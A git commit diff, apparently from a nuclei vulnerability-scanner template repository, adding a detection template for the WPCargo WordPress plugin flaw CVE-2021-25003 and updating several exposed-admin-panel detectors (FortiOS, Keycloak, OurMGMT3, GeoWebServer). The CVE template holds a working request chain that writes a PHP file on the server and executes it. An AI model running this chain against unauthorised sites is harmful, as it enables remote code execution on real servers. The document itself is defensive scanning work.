lu4nx 2022-11-04 19:57:21 +08:00
commit 2fd2a176a9
No known key found for this signature in database
GPG Key ID: 5C748E5F36388145
7 changed files with 118 additions and 16 deletions

View File

@ -1,3 +1,4 @@
cves/2021/CVE-2021-25003.yaml
cves/2021/CVE-2021-40661.yaml
cves/2022/CVE-2022-22242.yaml
cves/2022/CVE-2022-38870.yaml
@ -14,6 +15,7 @@ exposed-panels/labkey-server-login.yaml
exposed-panels/nginx-admin-panel.yaml
exposed-panels/nginx-ui-dashboard.yaml
exposed-panels/nport-web-console.yaml
exposed-panels/ourmgmt3-panel.yaml
exposed-panels/xiaomi-wireless-router-login.yaml
exposed-panels/xnat-login.yaml
misconfiguration/ampache-update-exposure.yaml

View File

@ -0,0 +1,51 @@
id: CVE-2021-25003
info:
name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution
author: theamanrawat
severity: critical
description: |
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
reference:
- https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
- https://wordpress.org/plugins/wpcargo/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25003
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-25003
cwe-id: CWE-434
metadata:
verified: "true"
tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan
variables:
num: "999999999"
requests:
- raw:
- |
GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2={{md5(num)}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 != 200"
- "status_code_2 == 200"
- "status_code_3 == 200"
- "contains(body_3, md5(num))"
- "contains(body_3, 'PNG')"
condition: and

View File

@ -1,32 +1,37 @@
id: fortios-panel
info:
name: FortiOs Exposed Panel
author: canberbamber
name: Fortios Exposed Panel
author: canberbamber,Jna1
severity: info
description: |
admin portal of fortios devices
reference:
- https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
metadata:
verified: true
shodan-query: http.favicon.hash:945408572
tags: panel,fortinet,fortios
requests:
- method: GET
path:
- "{{BaseURL}}/remote/login?lang=en"
- raw:
- |
GET /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Please Login</title>"
- "Launch FortiClient"
condition: and
- '/remote/login'
- type: word
part: header
words:
- "text/html"
- 'Server: xxxxxxxx-xxxxx'
- type: status
status:
- 200
- 403

View File

@ -4,6 +4,9 @@ info:
name: Keycloak Admin Panel
author: incogbyte,righettod
severity: info
metadata:
verified: true
shodan-query: http.favicon.hash:-1105083093
tags: panel,keycloak
requests:
@ -12,13 +15,18 @@ requests:
- "{{BaseURL}}/auth/admin/master/console/"
- "{{BaseURL}}/auth/admin"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<a href=\"http://www.keycloak.org\">"
- "keycloak"
part: body
condition: or
- type: status
status:
- 200

View File

@ -0,0 +1,28 @@
id: ourmgmt3-panel
info:
name: OurMGMT3 Admin Panel
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: http.title:"OurMGMT3"
tags: panel,ourmgmt3
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/admin/login'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'OurMGMT3 Debug client'
- type: status
status:
- 200

View File

@ -1,10 +1,11 @@
id: geo-webserver
id: geo-webserver-detect
info:
name: GeoWebServer Detector
author: dhiyaneshDK
author: dhiyaneshDK,daffainfo
severity: info
metadata:
verified: true
shodan-query: http.title:"GeoWebServer"
tags: panel,geowebserver
@ -22,3 +23,10 @@ requests:
- type: word
words:
- "<TITLE>GeoWebServer</TITLE>"
extractors:
- type: regex
part: header
group: 1
regex:
- 'Server: GeoWebServer ([0-9.]+)'

View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all GeoWebServer related nuclei templates on a given target.
workflows:
- template: technologies/geo-webserver.yaml
- template: technologies/geo-webserver-detect.yaml
subtemplates:
- tags: geowebserver
- tags: geowebserver